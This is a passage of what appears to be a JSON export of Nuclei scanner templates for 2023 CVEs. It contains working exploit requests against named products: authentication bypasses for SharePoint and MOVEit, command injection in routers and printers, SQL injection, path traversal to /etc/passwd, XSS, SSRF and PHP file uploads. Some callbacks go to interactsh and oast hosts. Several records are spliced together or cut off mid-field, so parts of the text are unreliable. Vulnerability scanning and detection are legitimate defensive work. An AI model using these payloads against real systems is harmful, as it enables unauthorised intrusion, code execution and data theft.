Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/modules/alkacon.mercury.template.jsondemo/elements/jsonapi.jsp?content&fallbackLocale&locale=en&rows=1&uri=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2023-34537","info":{"name":"Hoteldruid 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /inizio.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nvers_hinc=1&nome_utente_phpr={{username}}&password_phpr={{password}}\n","POST /creaprezzi.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanno=2023&id_sessione=&tipotariffa=a19yc%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3emjf9oc2183m&inizioperiodosett1=2023-12-24&fineperiodosett1=2023-12-31&tipo_prezzo=sett&prezzosett=&prezzosettp=&prezzoperiodo1=&prezzoperiodo1p=&prezzoperiodo2=&prezzoperiodo2p=&prezzoperiodo3=&prezzoperiodo3p=&prezzoperiodo4=&prezzoperiodo4p=&prezzoperiodo5=&prezzoperiodo5p=&prezzoperiodo6=&prezzoperiodo6p=&prezzoperiodo7=&prezzoperiodo7p=&inserisci_settimanalmente=1\n"],"skip-variables-check":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"HotelDruid\")"],"condition":"and"}]}]},{"id":"CVE-2023-29357","info":{"name":"Microsoft SharePoint - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer\n","GET /_api/web/siteusers HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nAuthorization: Bearer {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\nX-PROOF_TOKEN: {{generate_jwt(\"{\\\"aud\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"iss\\\":\\\"{{client_id}}\\\",\\\"nbf\\\":1695987703,\\\"exp\\\":2011547223,\\\"ver\\\":\\\"hashedprooftoken\\\",\\\"nameid\\\":\\\"{{client_id}}@{{realm}}\\\",\\\"endpointurl\\\":\\\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\\\",\\\"endpointurlLength\\\":1,\\\"isloopback\\\":true}\",\"none\")}}AAA\n"],"extractors":[{"type":"regex","part":"header","group":1,"name":"realm","regex":["realm=\"([^\"]*)\""],"internal":true},{"type":"json","json":[".value[].Email"]}],"matchers":[{"type":"word","part":"body_2","words":["LoginName","Email","IsSiteAdmin"],"condition":"and"}]}]},{"id":"CVE-2023-34259","info":{"name":"Kyocera TASKalfa printer - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"server","words":["KM-MFP"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\", \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-30013","info":{"name":"TOTOLink - Unauthenticated Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"command\":\"127.0.0.1; ls>../{{randstr}};#\",\"num\":\"230\",\"topicurl\":\"setTracerouteCfg\"}\n","GET /{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["lan_ip","reserv"],"condition":"and"},{"type":"word","part":"body_2","words":[".sh",".cgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"TOTOLINK\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29084","info":{"name":"ManageEngine ADManager Plus - Command Injection","severity":"high"},"requests":[{"raw":["POST /j_security_check HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nis_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator\n","GET /home.do HTTP/1.1\nHost: {{Hostname}}\n","POST /api/json/admin/saveServerSettings HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nparams=[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"1.1.1.1\",\"USER_NAME\":\"random\",\"PASSWORD\":\"asd\\r\\n{{cmd}}\",\"PORT\":\"80\"}]&admpcsrf={{admpcsrf}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"message\":\"","Proxy Settings"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"kval","name":"admpcsrf","internal":true,"kval":["admpcsrf"],"part":"header"}]}]},{"id":"CVE-2023-0777","info":{"name":"modoboa 2.0.4 - Admin TakeOver","severity":"critical"},"requests":[{"raw":["GET /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /accounts/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&username={{username}}&password={{password}}&next=%2F\n","GET /dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"username":["admin"],"password":["password"]},"attack":"pitchfork","host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"Dashboard\") && contains(body_3, \"Hello admin\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"header","name":"csrftoken","internal":true,"group":1,"regex":["csrftoken=([A-Za-z0-9]+)"]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-44813","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invite?mode=model%27)%3balert(document.domain)%2f%2f;'"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["initInviteFriendBtn('model');alert(document.domain)//;"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0948","info":{"name":"WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=peachpay&tab=field&\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"peachpay\")"],"condition":"and"}]}]},{"id":"CVE-2023-38992","info":{"name":"Jeecg-Boot v3.5.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username","{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"],"payloads":{"path":[null,"jeecg-boot/"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parentId\\\":\", \"key\\\":\", \"{\\\"title\", \"success\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27034","info":{"name":"Jms Blog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(tolower(body), \"jmsblog\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["duration>=6"]}]}]},{"id":"CVE-2023-29204","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me","{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-39141","info":{"name":"Aria2 WebUI - Path traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/../../../../etc/passwd"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Aria2 WebUI\")","regex(\"root:x:0:0:\",body_2)"],"condition":"and"}]}]},{"id":"CVE-2023-27640","info":{"name":"PrestaShop tshirtecommerce - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(base64_decode(body), \"PrestaShop\", \"=6","status_code == 302","contains(content_type, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-34659","info":{"name":"JeecgBoot 3.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/show HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"id\":\"961455b47c0b86dc961e90b5893bff05\",\"apiUrl\":\"\",\"params\":\"{\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(version())),1)) or '%%' like '\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XPATH syntax error:","SQLException"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-31548","info":{"name":"ChurchCRM v4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /FundRaiserEditor.php?linkBack=&FundRaiserID=-1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nFundRaiserSubmit=Save&Date=2023-06-24&Title=%22+onfocus%3D%22alert%28document.domain%29%22+autofocus%3D%22&Description=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=\\\"alert(document.domain)\\\" autofocus=\\\"\\\">
    ([0-9.]+)"]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-44352","info":{"name":"Adobe Coldfusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{string}}\">/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}\">/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}/{{string}}\">/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}\">/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm","{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm","{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"/{{string}}\">","\"{{string}}\">"],"condition":"or"},{"type":"dsl","dsl":["contains(body, 'ColdFusion')","contains(header, 'text/html')"],"condition":"and"}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"\")"],"condition":"and"}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+-->"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6389","info":{"name":"WordPress Toolbar <= 2.2.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5375","info":{"name":"Mosparo < 1.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/project/switch/1?targetPath=http://oast.pro"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"]}]}]},{"id":"CVE-2023-6018","info":{"name":"Mlflow - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"http://{{interactsh-url}}/api/2.0/mlflow-artifacts/artifacts/\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{model_name}}\", \"source\": \"models:/{{model_name}}/1\"}\n","GET /model-versions/get-artifact?path=random&name={{model_name}}&version=2 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["\"registered_model\":","\"name\":"],"condition":"and"}]}]},{"id":"CVE-2023-50719","info":{"name":"XWiki < 4.10.15 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=","{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["hash:SHA","XWikiUsers[0].password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-37629","info":{"name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","severity":"critical"},"requests":[{"raw":["POST /pig/add-pig.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigno\"\n\npig-fms-100\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"weight\"\n\n65465\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"arrived\"\n\n{{date_time(\"%Y-%M-%D\")}}\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"gender\"\n\nfemale\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"status\"\n\nactive\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"breed\"\n\n2\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"remark\"\n\n4fwefwe\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"pigphoto\"; filename=\"{{rand_base(5)}}\".php\"\nContent-Type: application/x-php\n\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"submit\"\n\n\n-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(content_type, \"text/html\")","contains(body, \"successfully created\")"],"condition":"and"}]}]},{"id":"CVE-2023-36845","info":{"name":"Juniper J-Web - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?PHPRC=/dev/fd/0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauto_prepend_file=\"/etc/passwd\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["Juniper"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-5914","info":{"name":"Citrix StoreFront - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/Citrix/teststoreAuth/SamlTest"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"\", \"XmlException\")"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; 